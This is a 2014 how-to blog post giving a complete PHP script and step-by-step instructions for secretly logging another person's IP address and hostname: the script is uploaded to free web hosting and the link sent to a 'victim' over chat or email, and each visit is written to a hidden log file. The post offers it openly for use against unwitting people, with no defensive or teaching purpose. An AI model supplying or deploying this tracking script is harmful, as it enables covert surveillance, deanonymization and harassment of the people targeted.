Featured Content

Quick Navigation

About All Tech Buzz

Thursday 29 May 2014

couch mode print story

How To Grab Someone IP Address ?

How to Grab Someone IP Address Using PHP Script. This Method Can be Used to Grab Someone IP Address on Yahoo or Facebook Chat or by Sending Mail to Victim. So Lets get Started.

Follow This Simple Steps to Grab Someone IP Address:

1. Copy All Text. 

<?php$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);$img_number = imagecreate(400,95);$backcolor = imagecolorallocate($img_number,10,102,153);$textcolor = imagecolorallocate($img_number,255,255,255);imagefill($img_number,0,0,$backcolor);$number0 = " This is Your IP/Proxy";$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";$number2 = " Host/Proxy: $hostname";$number4 = " _________________________________";Imagestring($img_number,10,5,5,$number0,$textcolor);Imagestring($img_number,10,5,25,$number1,$textcolor);Imagestring($img_number,10,5,45,$number2,$textcolor);Imagestring($img_number,10,5,50,$number4,$textcolor);Imagestring($img_number,10,8,50,$number4,$textcolor);Imagestring($img_number,10,5,10,$number4,$textcolor);Imagestring($img_number,10,8,10,$number4,$textcolor);header("Content-type: image/png");imagepng($img_number);$file=fopen("Name-here-to-protect-the-File.txt","a");$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";fwrite($file, $file2);fclose($file);?>

2. Copy the Codes into Notepad and save it as Grab.php (.php is must).

3. Now Make Free Account on any of the free Web Hosting Sites Like 000Webhost  or on My3gb , ETC.

4.  Now Upload Grab.php to your Web Hosting Site.

5. Copy the Link of your Uploaded File and Send it to Victim. As Soon as Victim Will Click on your Link his IP will be Saved in your Free Web Hosting Site.

Don't Forget To Comment We Are Working Hard Only for You.

Written by Neeraj Jivnanik, personal technology columnist and founder of My Tech Buzz. You can follow him on the social web or sign up for the email newsletter for your daily dose of how-to guides and video tutorials.




0 comments:

Post a Comment

Categories

  • Internet Tricks
  • How To
  • Other Tricks
  • Android Apps
  • Blogging
  • Free Software
  • Android Tricks
  • Featured

Search This Blog